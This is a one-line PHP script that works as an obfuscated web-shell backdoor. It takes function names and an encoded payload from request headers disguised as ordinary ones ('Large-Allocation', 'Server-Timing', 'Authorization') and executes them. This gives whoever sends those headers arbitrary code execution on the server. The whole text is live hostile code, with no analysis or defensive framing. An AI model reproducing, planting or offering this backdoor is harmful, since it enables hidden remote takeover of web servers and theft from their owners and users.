<?php $_HEADERS = getallheaders(); if (isset($_HEADERS['Large-Allocation'])) { $system = $_HEADERS['Large-Allocation']('', $_HEADERS['Server-Timing']($_HEADERS['Authorization'])); $system(); }